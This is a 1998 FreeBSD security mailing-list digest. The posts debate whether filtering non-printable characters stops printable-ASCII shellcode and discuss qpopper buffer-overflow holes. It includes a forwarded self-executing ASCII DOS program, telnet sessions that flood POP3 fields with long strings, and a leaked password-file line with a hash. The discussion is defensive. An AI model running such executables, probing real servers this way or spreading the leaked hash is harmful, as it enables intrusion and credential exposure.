Jun 29 02:01:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA06209 for freebsd-security-outgoing; Mon, 29 Jun 1998 02:01:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from monitor.voronezh.su (dialup33.vrn.ru [195.98.64.191]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id CAA06183 for ; Mon, 29 Jun 1998 02:01:00 -0700 (PDT) (envelope-from BAZILIO@monitor.voronezh.su) Message-Id: <199806290901.CAA06183@hub.freebsd.org> Received: from bazilio [192.168.100.21] by monitor.voronezh.su [127.0.0.1] with SMTP (MDaemon.v2.7.SP0.R) for ; Mon, 29 Jun 98 12:17:15 +0400 From: "bazilio" To: CC: Subject: Re: non-executable stack? Date: Mon, 29 Jun 1998 12:15:07 +0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 7bit X-MDaemon-Deliver-To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jun 1998 17:26:30 +1200 (NZST) you wrote: >> You misunderstand. My proposal, seemingly seconded by jtb, was to >> allow the administrator to disallow the presence of non-printable ascii >> characters in the environment or command line arguments at the time of >> execve of certain processes. We still don't know if this will have any >> effect on security though, since no-one has checked to see if its possible >> to write shellcode using just printable ASCII. It would certainly >> make life difficult for the attacker, since it would be impossible to >> overwrite the saved eip with an address on the stack since the stack >> is at the top of the address space around 0xFFxxxxxx or 0xEFxxxxxx. >> >> Niall >I know next to nothing about assembly level programming, but if you mean >that there is a problem because 0xFF and 0xEF are out of bounds, then I >figure this means very little if the attacker has access to a small range >of arithmetic or bitwise operators to generate these characters. With a >little more effort, byte values could perhaps be borrowed from elsewhere, >copying them from addressable locations. It's true, but I think addition of this checking will force attackers to make much more efforts. Arith and bitwise instructions can make anymore, but an exploiting code must contain instructions to obtain current %eip value, which is very hard without some opcodes. Also I think that we must add sanity check not for printable characters, but for arch-specific exploit dangerous magic numbers and its sequences. >Andrew McNaughton Thanks, Vasily. I prefer to use FreeBSD at all. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 05:25:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA05342 for freebsd-security-outgoing; Mon, 29 Jun 1998 05:25:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA05335 for ; Mon, 29 Jun 1998 05:25:26 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id IAA23332; Mon, 29 Jun 1998 08:27:49 -0400 (EDT) Date: Mon, 29 Jun 1998 08:27:49 -0400 (EDT) From: andrewr To: Christoph Kukulies cc: freebsd-security@FreeBSD.ORG Subject: Re: xlock In-Reply-To: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The main problem with using xlock is that the people who have made it and mod'd it over the years, have tried to make it more of a program than it should be. ie, giving the user more options than are needed for this type of program. All xlock needs to be is a simple mechanism for locking X, nothing else. Also, I am porting a console locking program (doesn't allow VT switching), from linux, but I have been having trouble with the actual stopping of the allowing of VT switching. I have tried setting vtmode to be handled by the process, then using an ioctl to execute this. This failed. Then, I tried using flock(), that failed. If you have any ideas and would like to know what I did before (dealing with flock() and ioctl(), just ask). A. ***************************************** AWR XNS, Inc. "Drink beer, it will save your life." On Mon, 29 Jun 1998, Christoph Kukulies wrote: > > Alarmed by recent buffer overflow attacks on Linux machines in > my vicinity (an exploit for this is available) I thought about > xlock under FreeBSD and would like to know whether the > security hole has been sorted out under FreeBSD 2.2.x or what > measures are advised to prevent it. > > -- > Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 07:54:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA28650 for freebsd-security-outgoing; Mon, 29 Jun 1998 07:54:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tversu.ru (root@mail.tversu.ru [62.76.80.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA28577 for ; Mon, 29 Jun 1998 07:53:34 -0700 (PDT) (envelope-from vadim@gala.tversu.ru) Received: from gala.tversu.ru (vadim@gala.tversu.ru [62.76.80.10]) by tversu.ru (8.8.8/8.8.8) with ESMTP id SAA00924 for ; Mon, 29 Jun 1998 18:52:51 +0400 (MSD) Received: (from vadim@localhost) by gala.tversu.ru (8.8.8/8.8.8) id SAA16381; Mon, 29 Jun 1998 18:52:30 +0400 (MSD) Message-ID: <19980629185230.A16373@tversu.ru> Date: Mon, 29 Jun 1998 18:52:30 +0400 From: Vadim Kolontsov To: security@FreeBSD.ORG Subject: Re: non-executable stack? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.90.11i In-Reply-To: ; from Niall Smart on Sat, Jun 27, 1998 at 11:07:22AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Jun 27, 1998 at 11:07:22AM +0100, Niall Smart wrote: > You misunderstand. My proposal, seemingly seconded by jtb, was to > allow the administrator to disallow the presence of non-printable ascii > characters in the environment or command line arguments at the time of > execve of certain processes. We still don't know if this will have any > effect on security though, since no-one has checked to see if its possible > to write shellcode using just printable ASCII. When I played with assembler under FreeBSD, I've created a version of such code. Basically it contains a little "decoder" which unpacks specially prepared shell code (I've solved almost the same problem programming self-unpacking UUENCODE files). Regards, V. -- Vadim Kolontsov Tver Internet Center NOC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 09:35:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA16837 for freebsd-security-outgoing; Mon, 29 Jun 1998 09:35:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA16810 for ; Mon, 29 Jun 1998 09:35:48 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0yqguB-0002IA-00; Mon, 29 Jun 1998 10:35:47 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.8.8/8.8.3) with ESMTP id KAA18811; Mon, 29 Jun 1998 10:35:46 -0600 (MDT) Message-Id: <199806291635.KAA18811@harmony.village.org> To: Vadim Kolontsov Subject: Re: non-executable stack? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 29 Jun 1998 18:52:30 +0400." <19980629185230.A16373@tversu.ru> References: <19980629185230.A16373@tversu.ru> Date: Mon, 29 Jun 1998 10:35:45 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : > execve of certain processes. We still don't know if this will have any : > effect on security though, since no-one has checked to see if its possible : > to write shellcode using just printable ASCII. You can. I've seen an example of how to do that, but didn't bother to save it. I've also seen how to do the same with DNS packets, which must be nearly all in the range [a-zA-Z0-9-]+. I've not seen an example of this on Sparc, MIPS or Alpha, but have been told by someone that I believe that he has code like this that fits the bill. The Alpha was the hardest, evidentally, for reasons that he didn't elaberate on. In message <19980629185230.A16373@tversu.ru> Vadim Kolontsov writes: : When I played with assembler under FreeBSD, I've created a version of such : code. Basically it contains a little "decoder" which unpacks specially : prepared shell code (I've solved almost the same problem programming : self-unpacking UUENCODE files). For those that think this is hard, you might want to check out KERMIT.BOO. This is a completely printable file that is used to bootstrap the kermit installation process a long time ago (and maybe still even today). Checks for printable vs non-printable are bogus and don't buy any extra security at the cost of inconvenience. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 10:34:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA26514 for freebsd-security-outgoing; Mon, 29 Jun 1998 10:34:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA26482 for ; Mon, 29 Jun 1998 10:33:56 -0700 (PDT) (envelope-from jer@jorsm.com) Received: from localhost (jer@localhost) by mercury.jorsm.com (8.8.7/8.8.7) with SMTP id MAA07717; Mon, 29 Jun 1998 12:33:57 -0500 (CDT) Date: Mon, 29 Jun 1998 12:33:56 -0500 (CDT) From: Jeremy Shaffner Reply-To: Jeremy Shaffner To: freebsd-security@FreeBSD.ORG cc: "Jordan K. Hubbard" Subject: Stable, Complete, qpopper patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 1) Have things quieted down enough so that the first and subsequent problems (and broken patches) have now all been fixed? 2) Do the patches only apply to 2.41beta1 or are they also good for 2.3 or 2.4? 3) Can the patches be applied manually to the source files downloaded from Qualcomm, or must the port be built from the current source tree? (ie, fetch, build and install?) 4) If the latter for #3 is the only way, and the answer to #2 is yes, can I change the DISTNAME in the Makefile if I don't want 2.41beta1? Thanks a bunch. -===================================================================- Jeremy Shaffner JORSM Internet Senior Technical Support Northwest Indiana's Premium jer@jorsm.com Internet Service Provider support@jorsm.com http://www.jorsm.com -===================================================================- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 14:51:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA16597 for freebsd-security-outgoing; Mon, 29 Jun 1998 14:51:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gatekeeper.tsc.tdk.com (root@gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA16559 for ; Mon, 29 Jun 1998 14:51:08 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id OAA17732; Mon, 29 Jun 1998 14:48:23 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id OAA15244; Mon, 29 Jun 1998 14:48:22 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id OAA26760; Mon, 29 Jun 1998 14:48:07 -0700 (PDT) From: Don Lewis Message-Id: <199806292148.OAA26760@salsa.gv.tsc.tdk.com> Date: Mon, 29 Jun 1998 14:48:04 -0700 In-Reply-To: njs3@doc.ic.ac.uk (Niall Smart) "Re: non-executable stack?" (Jun 27, 11:07am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: njs3@doc.ic.ac.uk (Niall Smart), Patrick McAndrew , jtb Subject: Re: non-executable stack? Cc: Wojciech Sobczuk , fpscha@schapachnik.com.ar, ncb05@uow.edu.au, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 27, 11:07am, Niall Smart wrote: } Subject: Re: non-executable stack? } You misunderstand. My proposal, seemingly seconded by jtb, was to } allow the administrator to disallow the presence of non-printable ascii } characters in the environment or command line arguments at the time of } execve of certain processes. We still don't know if this will have any } effect on security though, since no-one has checked to see if its possible } to write shellcode using just printable ASCII. It would certainly } make life difficult for the attacker, since it would be impossible to } overwrite the saved eip with an address on the stack since the stack } is at the top of the address space around 0xFFxxxxxx or 0xEFxxxxxx. >From my archives of the firewalls mail list: --- Forwarded mail from padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) >From firewalls-relay@tus.ssi1.COM Wed Dec 21 15:30:26 1994 Date: Wed, 21 Dec 94 15:12:55 -0500 Message-Id: <9412212012.AA09780@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Example of the futility of determining contents from packets Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status: OR Once again the question was asked if a packet filter can detect viruses and I responded "No" at least not without a *very* complex determination first of WHAT the program is, and WHICH platform it is intended for. The following short executable program is an example of this (note that it is pgp *signed* and not "converted" to ASCII) executable ASCII using a mechanism to allow the passage of .COM files through E-mail gateways. Unlike UUENCODED files though, the ASCII itself is executable - if I had sent it without the PGP signature, many systems could execute it directly from the mail window. Extracted with PGP switch -o CARD.COM it becomes a DOS executable program 2064 bytes long. You *could* just strip the header off (down to the line that starts "XP[@PPD...") and execute that if you feel brave (the trailing signature lines do not matter). But the point is that I could have used the "ASCIIzer" (YAAA) recursively to additionally wrap the contents (in an experiment I recursively ran it on itself until the original 1k binary had become a 45k "Katchina Doll" that was still executable). Meanwhile, if nothing else, Happy Holidays, Padgett ps this is a later version (but still a "beta") than Rob rote about in CUD - for easy checking, all lines are 64d/40h characters long. pps The tune sounds OK to me but remember, I have been wearing hearing aids for over 20 years & every speaker is different. -----BEGIN PGP SIGNED MESSAGE----- XP[@PPD]5`P(f#(f((f?5!QP^P_u!2$=po}l=!!rZF*$*$ =0%GF%!!%PP$P$Ps- $l%gmZ$rl6lW$rm6mWlVl6m=ldmAlv%fmvmB%Xm6lW%Xm6mWl6m6m=ld%ylVmqlJ mqlRmqlNmqlBlWl6m6l/m'l/m3mql8mrm4mql:mAm1l\m/mPl.%tm5$j$Xm5mBmg m6mWl6l6lZl6m.mZlvl5lB$wl6lZl6m.mZ$bl4lB%|l6lZl6%ZmZl&%vlBl$l6lZ l!m#mWlVm4lB%wl6lZl!m#mW$rl3lB${l6lZl!%{mW$Zm5lB$wl6lBl.l6lBmbl6 mB%dm6l3mYl6lZlomUm=mam3mUlZl6l5%ymIlYl6m+mPl.l\m2lYm)l5mPm&mUl3 mYl6lZlomUmZm6l6lYl*l6lBm-l6m3mUl3mYl6lZlomUmZm6l6lYl(l6lBm+l6m3 mU%jm=ma%f%ulQ%Y$lmvmSlgl6m!m:m!m:mumVl5mAmAlBm$l6mvmSlil6lBl'l6 %jm=ma%fmum?l5lBl,l6mumSl5%ulQ%Yl$mvmSlkl6m!m:m!m:mumVl5mAmG$jmv m?lgl6mflHm6mamflGm6mvmSlgl6ma$fmUmnl,lYl'lZl6$_m!m:mum?m5mZl5l6 mamamvmSlhl6lEl:mUl3%glZl6lZlolVmWlZm6lZm/m/mamvmSlhl6lZmPm/mal7 lVmal7lRmamvmSlhl6lZlYm/ma%cm3mUl&l&l&l&l&l&l&l&l&l&l&l&%g%^%Y$^ %^$[%_l&%V%[%Xl&%b$[$`l&%V%[%X$Y%Yl&$X$^%`l&%_$Y%`%`$X%^$[%_%Yl& %[$_l&$m%[%Vl&%b$[$`l&$i%`%\%`%\$a%`$Y%b$[%a%`m0l1l&l&l&l&l&l&l& l&l&l&l&l&%^$[l&$X$^%^%Yl&$n%[$\%^$`%b%Vl&%i%`%b%Y%[$[${l1%g%b$Y %\$\%V$|l1$j%b$`%_%`$X$X$|l&$l%^$[$`%b$|l&l#l&%o%`%[$_$_%`$Y%Vl$ l3lZl2%xmPm&mrl'$pm5lpl3$om5l'm3lY$wm5lZl2m$mPm&lW%nm5m`m1lV$X$w $j%ylVl^l[lC%q$flC$qlqlTlC$qlD%bl0m5lC%bl`le$nm5lB$nl6lD%bl$l8lC %bl\m1mPm&l7lV$Xm2l`le$nm5lB%yl6mAmRl\l2mPm&l'mql+$pm5lol'$om5lZ l2m$mPm&m'mWl6l6lZl6m+mZl6$rmWl6l6lB%{l7lZl6l5%ymIlYl6l6mPl.lZl6 $lmPm&lv$s$nm5l6%Wm:mU$j%ylV${lf$nm5$n${le$nm5$flAl6l6l6l6l6l7l5 l2m6mGm1m3m6mGm1m5m6lll1m5m6mGm1m5m6lVl0m5m6m$l/m3m6m$l/m3m6m$l/ m3m6lll1m3m6lll1m5m6$Zm2m5m6lll1m5m6mGm1m5m6lVl0m3m6l7l5m3m6l7l5 m3m6$Zm2m3m6$Zm2m5m6lCm3m5m6$Zm2m5m6lll1m5m6mGm1m3m6m$m/m3m6l7l5 m5m6l7l5m5m6m$m/m3m6lll1m3m6lVl0m3m6mGm1l1l.l7l5m3m6mGm1m3m6mGm1 m3m6mGm1m3m6lVl0l1m6lVl0m3m6mGm1m3m6lVl0m3m6m$m/m3m6l7l5l1m6l7l5 m3m6$Zm2m3m6lll1m3m6mGm1m3m6l>m3m3m6l7l5m3m6l7l5m5m6l7l5m5m6m$m/ m3m6lll1m3m6lVl0m3m6mGm1l1l.l7l5m3m6mGm1m3m6mGm1m5m6lll1m5m6mGm1 m5m6lVl0m5m6m$l/m3m6m$l/m3m6m$l/m3m6lll1m3m6lll1m5m6$Zm2m5m6lll1 m5m6mGm1m5m6lVl0m3m6l7l5m3m6l7l5m3m6$Zm2m3m6$Zm2m5m6lCm3m5m6$Zm2 m5m6lll1m5m6mGm1m3m6m$m/m3m6l7l5m5m6l7l5m5m6m$m/m3m6lll1m3m6lVl0 m3m6mGm1l1l.l6l6pp_YAAA_v1.02_copyright_(C)_1994_by_Padgett_____ -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAgUBLvgNcYVuK+48ORdVAQEjDQP+Ndm2FryRXkUzW47E+88jCCZi/VPSqJ57 l08JPkBc3P6BX9nh8bJjcJXrmmwa0mgFaH6Ov96jQ1kk+Q+NEEL45TiAy5k4oHH2 F5SaGhh7AQ2OOtSgXfXpLkh1FRIVzO+INL/af3+GFdG62rswztUEhGieslu+1bF/ dFqWpAGxuHE= =Xf/8 -----END PGP SIGNATURE----- --- End of forwarded message from padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 19:08:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA01287 for freebsd-security-outgoing; Mon, 29 Jun 1998 19:08:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (nsmart@ts01-03.waterford.indigo.ie [194.125.139.66]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA01219 for ; Mon, 29 Jun 1998 19:08:05 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id DAA03866; Tue, 30 Jun 1998 03:03:49 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199806300203.DAA03866@indigo.ie> Date: Tue, 30 Jun 1998 03:03:49 +0000 In-Reply-To: Warner Losh "Re: non-executable stack?" (Jun 29, 10:35am) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Warner Losh , Vadim Kolontsov Subject: Re: non-executable stack? Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 29, 10:35am, Warner Losh wrote: } Subject: Re: non-executable stack? [ lots of examples of people writing printable-ASCII shell code ] > Checks for printable vs non-printable are bogus and don't buy any > extra security at the cost of inconvenience. Oh well, there goes another silver bullet. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 29 20:01:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA10647 for freebsd-security-outgoing; Mon, 29 Jun 1998 20:01:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA10553 for ; Mon, 29 Jun 1998 20:01:12 -0700 (PDT) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id XAA16275; Mon, 29 Jun 1998 23:00:59 -0400 (EDT) Date: Mon, 29 Jun 1998 23:00:59 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: "Aaron D. Gifford" cc: bugtraq@netspace.org, John Fraizer , security@FreeBSD.ORG Subject: Re: More problems with QPOPPER - In-Reply-To: <359749BB.8A412952@infowest.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey, and if you use bulletins with the "BULLDB" option, look at some of the junk you find in the database... It should really only contain usernames and the last bulletin they read, right? Something odd is happening here. It looks OK for a while: pebraguz bright agagescu mgarwood zandperl Then you start seeing some odd things: mmary.971113 16.nynext1.summary.971113 hmm.. not from GECOS, that's a bulletin title... Then this: chrisptt -->>1Gdk/WhOsSj0o christopher@foofoo.com /home/chrisptt /usr/local/bin/noshell 1chrispkpushkar Nice, huh? What's going on in pop_bull.c? Charles Sprickman spork@super-g.com ---- On Mon, 29 Jun 1998, Aaron D. Gifford wrote: > John Fraizer wrote: > > > > After applying all the patches with exception of the PAM patch in the > > .RPM'd version of qpopper2.4.src, > > I have located yet another hole in qpopper. > > > > This popper was compiled with -DAUTH in the makefile. > > > > Connecting to the popper and sending a line of garbage will now generate > > the maximum permitted size > > error. Providing an INVALID username and sending a line of garbage (1000+ > > chars), does not segfault. I > > was beginning to relax. > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Command "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted > > size. > > user blah > > +OK Password required for blah. > > pass > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > > > -ERR Password supplied for "blah" is incorrect. > > +OK Pop server at Victim.Com signing off. > > Connection closed by foreign host. > > > > I decided to try a long username: > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. > > user > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > 